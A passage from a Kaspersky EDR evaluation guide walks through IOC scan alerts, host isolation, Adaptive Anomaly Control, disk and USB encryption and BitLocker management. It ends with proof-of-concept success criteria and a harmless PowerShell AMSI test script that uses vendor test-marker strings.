6. Switch to the Application settings tab and open the IOC Scan Results section. Click the IOC detected link. 7. The IOC results window opens. Here you see the list of IOCs that were found during scan. Click on the matched link. 8. The Alert Details window opens. Here you see where the file was located and according to which criteria it was detected. 9. Note that the network connection was limited on a managed host according to the action selected in the IOC scan task settings. Learn more about detected threat 1. Open the alert card and click Kaspersky Open Threat Intelligence Portal or Kaspersky Threat Intelligence Portal link. Review the description and close the tip dialog. 2. Click on the link representing MD5 hash. You will see pop-up block with links Kaspersky Open Threat Intelligence Portal and Kaspersky Threat Intelligence Portal. 3. Kaspersky Threat Intelligence portal web page opens. Here you can get the information about the detected objects. Since we are using a synthetic sample imitating malicious activity in this example, the relevant information already exists in online reputation database. In case of a real unknown threat the database might reveal that a file was not previously detected and there is no information about it thus indicating a high risk of threat. Disable network isolation 1. If you need to see the list of isolated hosts open KSC and go to Devices – Tags – Device tags section. Click the View devices link next to the ISOLATED FROM NETWORK tag. 2. In order to cancel the network isolation, open the alert card, click Unblock computer isolated from network and confirm the action in the appeared dialog windows. 3. When the host is unblocked, a user gets a notification that network limitations are removed. After completing these steps, you evaluated Kaspersky EDR Optimum core functionality. Adaptive Anomaly Control This component monitors and blocks abnormal behavior of applications. By default, it operates in the Smart mode. In this mode, the component collects data about applications’ activities, learns, and does not block anything. If there are no detection events for 14 days, the Smart mode will be automatically changed to the Block mode, and non-typical software activities will get stopped. If there are detection events during the learning period, the Administrator must react to these events (confirm detection or add to exclusions). Otherwise, the learning period (Smart mode) will be extended for another 14 days. In this scenario, we will demonstrate that Kaspersky Endpoint Security for Windows can block abnormal activity on the protected computers. Evaluation steps: 1. Configure the Kaspersky Endpoint Security for Windows policy. 2. Emulate an abnormal activity on a protected computer. 3. Make sure the abnormal activity has been blocked. Expected results: Adaptive Anomaly Control will detect and block the abnormal activity. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Security Controls section and in the right pane click on Adaptive Anomaly Control. 2. Check that Adaptive Anomaly Control is enabled and click Rules. 3. If it is required to approve updates for the Adaptive Anomaly Control rule list click Approve updates. 4. For ease of demonstration we will switch one of the rules to the Block mode. Otherwise, it would be necessary to wait for 14 days minimum. Expand the Use of Windows Management Instrumentation (WMI) section and switch the Start of Microsoft HTML Application Host from WMI rule to the Block mode. Save the changes and close the policy. 5. Switch to a managed device. Try to launch the WMI_HTML_Application_Host_from_WMI.bat file emulating the abnormal activity. You can request this file from [email protected] . For external customers: please contact us via a partner’s representative or Kaspersky sales managers. Make sure that the file execution has been blocked and you see a correspond notification from Kaspersky Endpoint Security. 6. You can also view the event either in the local Kaspersky Endpoint Security GUI or in the Kaspersky Security Center Web Console. To do that in the Kaspersky Security Center Web Console go to Monitoring & Reporting – Event Selection – click Recent events. Check that you see an corresponding event. In this scenario, we have demonstrated that Kaspersky Endpoint Security for Windows can block abnormal activity on the protected computers. Full Disk Encryption The full disk encryption feature protects data from being accessed by unauthorized persons if a laptop or a hard drive is stolen. In this scenario, we will demonstrate that using Kaspersky Endpoint Security for Windows you can implement full drive encryption on your computer. Evaluation steps: 1. Configure and apply an encryption policy. 2. Wait until the encryption process starts. Expected results: Hard drive is encrypted. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Full Disk Encryption. 2. Select Kaspersky Disk Encryption as the encryption technology and click on the Kaspersky Disk Encryption link. 3. Change the encryption mode to Encrypt all hard drives. Select Encrypt used disk space only (reduces encryption time). Leave other settings unchanged. Save and close the policy. 4. Restart the target computer. During the system reboot the Authentication Agent will run in the test mode in order to ensure the hardware compatibility. 5. After the reboot is completed the Encryption status of the computer will have changed to Applying policy. This means that the encryption process has been started. You can check the status by opening the encrypted device properties – General – Protection. The disk encryption status will be shown in the right pane. The encryption process is performing in background and fully transparent to a user. It is not necessary to wait until the drive will be 100% encrypted. 6. You can also check the disk drive encryption status at Operations – Data Encryption And Protection – Encrypted Drives. 7. If a user performs a system reboot, he will see the Authentication agent before the OS starts. After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can implement full drive encryption on your computer. USB File Level Encryption with portable file manager Kaspersky Endpoint Security allows to secure sensitive data with the file level encryption technology when data are transferred on removable drives. In this scenario, we will demonstrate how to configure USB File Level Encryption with the portable file manager in order to ensure that sensitive data on the removable drive can be accessed only by an authorized person. Please note that this scenario screenshots were captured from another testing environment due to CloudShare platform limitations, which makes it impossible to emulate flash drive. The process on new versions of Kaspersky products stays the same, but some UI elements may be slightly different. Evaluation steps: 1. 2. 3. 4. Configure and apply an encryption policy. Copy a sample file to a removable drive. Connect the removable drive to another computer and try to access the data. Run the portable file manager and access the encrypted data. Expected results: Data can be accessed only with authorization via the portable file manager. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Encryption of removable drives. 2. Set the encryption mode to Encrypt new files only and enable Portable mode. Save the policy and close its properties. 3. After the policy is applied when a user connects a USB drive to the computer, he sees the following dialog box. If the user chooses the Do not encrypt files option the drive will be available only for reading. To be able to write to the disk the user has to select the Encrypt files option. 4. Next, the user will be asked to create a password for the portable file manager. 5. When the password is set it is allowed to write to the USB drive. 6. Create a text file (New file.txt in this example) and copy it to the USB drive. The file will be encrypted as soon as it is copied to the drive. Connect the USB drive to a computer without Kaspersky Endpoint Security and try to open the newly encrypted file. You will see that the file is encrypted, and the content is unreadable. 7. Now launch the portable file manager (pmv.exe) and enter the password. 8. With the portable file manager, you will access the file. After completing these steps, you have successfully demonstrated how to configure USB File Level Encryption with the portable file manager in order to ensure that sensitive data on the removable drive can be accessed only by an authorized person. BitLocker management Kaspersky Endpoint Security for Windows offers the BitLocker management capability in order to provide more flexible tools for drive encryption. In this scenario, we will demonstrate that using Kaspersky Endpoint Security for Windows you can encrypt hard drives with the BitLocker Drive Encryption technology. Evaluation steps: 1. Configure and apply an encryption policy. 2. Wait until the encryption process completes. Expected results: A hard drive is encrypted with the BitLocker Drive Encryption technology. Instructions: 1. Open the Kaspersky Security Center Web Console and switch to the Devices – Policies & Profiles section. Click on the Kaspersky Endpoint Security for Windows policy properties, switch to the Application Settings tab – Data Encryption section and in the right pane click on Full Disk Encryption. 2. Select BitLocker Drive Encryption as the encryption technology and click on the BitLocker Drive Encryption link. 3. Change the encryption mode to Encrypt all hard drives. Set other settings in accordance with your environment. Save and close the policy. 4. As soon as the policy’s applied, the user is asked to set a password. 5. The drive encryption will start after the system reboot. 6. During the system reboot, the user will be asked for the password in the BitLocker pre-boot authentication. 7. After the reboot you will see a message about the encryption process on the target device if you hover the mouse over the BitLocker icon. 8. After the reboot is completed the Encryption status of the computer will have changed to Applying policy. This means that the encryption process has started. You can check the status by opening the encrypted device properties – General – Protection. The disk encryption status will be shown in the right pane. The encryption process is performing in background and is fully transparent to the user. It is not necessary to wait until the drive is 100% encrypted. 9. You can also check the disk drive encryption status at Operations – Data Encryption And Protection – Encrypted Drives. After completing these steps, you have successfully demonstrated that using Kaspersky Endpoint Security for Windows you can encrypt hard drives with the BitLocker Drive Encryption technology. Appendix A: POC success criteria # Task 1. Success criteria Prepare environment 1.1. Review the requirements POC environment meets all the imposed requirements 1.2. Download the required files Installation packages are downloaded from the official web site. 1.3. Configure the network All the required network ports are open in the correct direction 2. Setup and deploy 2.1. Kaspersky Security Center deployment 2.1.1. Install Kaspersky Security Center Kaspersky Security Center Administration Server and Administration Consoles are installed. 2.2. Configure Kaspersky Security Center Quick Configuration Wizard completed successfully. Administration policies and tasks for Kaspersky applications are created. Management plug-ins and distribution packages for Kaspersky applications are added to the Kaspersky Security Center. Kaspersky Security Center is activated with a valid license. 2.3. Deploy protection for Windows devices Network Agent for Windows and Kaspersky Endpoint Security for Windows are installed on the target devices. 2.4. Post-installation tasks Security applications are activated, databases are updated, management policies are created and applied to the security applications. 3. NEXT EDR Foundations 3.1. Web Threat Protection Malicious URL is detected. Web access to the malicious URL is blocked. 3.2. Network Threat Protection Network attack and port scanning are detected. 3.3. AMSI Protection Provider PowerShell script execution is prevented. 3.4. Exploit Prevention testing Vulnerability exploitation is prevented. 3.5. Web Control Access to the specific web resources is denied. Notes 3.6. Device Control The use of the forbidden device type is denied. 3.7. Anti-Bridging The use of an alternative network interface is denied. 3.8. Application Control A Default Deny policy is applied, and an application added to the Allowlist can be launched. 4. NEXT EDR Optimum 4.1. Emulate the attack Attack emulated, threat development graph built. 4.2. Execution prevention Startup of the application blocked by EDR Optimum. 4.3. Host isolation Infected host isolated. 4.4. IoC Scan Other infected hosts detected using IoC scan task. 4.5. Adaptive Anomaly Control Abnormal activity on a client device is blocked. 4.6. Full Disk Encryption The hard drive is encrypted with the Kaspersky encryption technology. 4.7. USB File Level Encryption with portable file manager Files on a USB flash drive are encrypted and can be accessed only with the portable file manager. 4.8. BitLocker management The hard drive is encrypted with the BitLocker technology. Appendix B: AMSI demonstration script bsstest_amsi.ps1: Get-Host | Select-Object Version | Write-Host Try { # Check invoke-expression works normally $text = iex 'return "#KLBssBlockMeAmsi#"' # Check invoke-expression delivered to bases (via BssTest rules) iex "#KLBssTestDynamicScriptAmsi#" } Catch { # First invoke failed? # Log exeception Write-Host $_ # Return error code Write-Host "Test failed" exit 1 } Try { # this should be blocked from bases (KDB scan) iex "#KLBssBlockMeBasesKdbAmsi#" Write-Host "Test failed" exit 2 } Catch { # Log exception Write-Host $_ } Try { # this very long string should be blocked from bases (KDB scan) $str = "#KLBssBlockMeBasesKdbAmsi#" + " " + "A" * 2 * 1024 * 1024 iex $str Write-Host "Test failed" exit 3 } Catch { # Log exception Write-Host $_ } # Test succeeded - return special code Write-Host "Test succeded" exit 5555